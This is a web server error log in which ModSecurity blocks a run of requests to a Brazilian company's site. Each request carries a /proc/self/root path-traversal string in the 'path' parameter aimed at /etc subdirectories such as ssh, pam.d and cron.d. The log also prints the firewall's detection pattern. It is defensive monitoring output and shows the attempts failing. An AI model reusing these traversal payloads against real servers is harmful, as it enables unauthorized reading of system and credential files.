[Wed Mar 18 09:38:56.684029 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:52572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc4OoXxyEfFpUF8f9inAAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:58.553370 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:52574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc4tY0UrI5A3LftIyYvgAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:59.878935 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:50502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc4-w_le52K8_3pV3T9gAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:01.336438 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:50514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc5cdf6f5d65gmYZTI_AAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:03.733387 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:50526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc50zinOy1jxa1j4cI3QAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:05.623083 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:50540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc6eoXxyEfFpUF8f9iowAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:06.899018 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:50546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc6kzinOy1jxa1j4cI5QAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:08.243093 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:50554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc7OoXxyEfFpUF8f9iqQAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:09.541476 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:34370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc7cdf6f5d65gmYZTJAQAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:10.799229 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:55146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc7vu8EFLIOrSqIpv5gwAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:39:10.879831 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:34380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc7ta6ubjKNq_cu4aNQQAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:13.035508 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:34396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc8Mdf6f5d65gmYZTJAwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:14.536263 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:34408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc8imAPhZkrhU8w4lhngAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:17.571259 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:34424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc9dY0UrI5A3LftIyY2wAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:18.882499 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:34426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc9uoXxyEfFpUF8f9iswAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:21.274243 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:33222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc-QkwaGbbGflqUZAEuAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:22.603436 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:33224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc-sdf6f5d65gmYZTJCAAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:25.175291 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:33226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc--oXxyEfFpUF8f9itgAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:26.994882 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:33230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc_uyqAr6etmhZHNqzuQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:28.363347 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:33244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdACmAPhZkrhU8w4lhpAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:29.701976 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:38544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdAfu8EFLIOrSqIpv5kgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
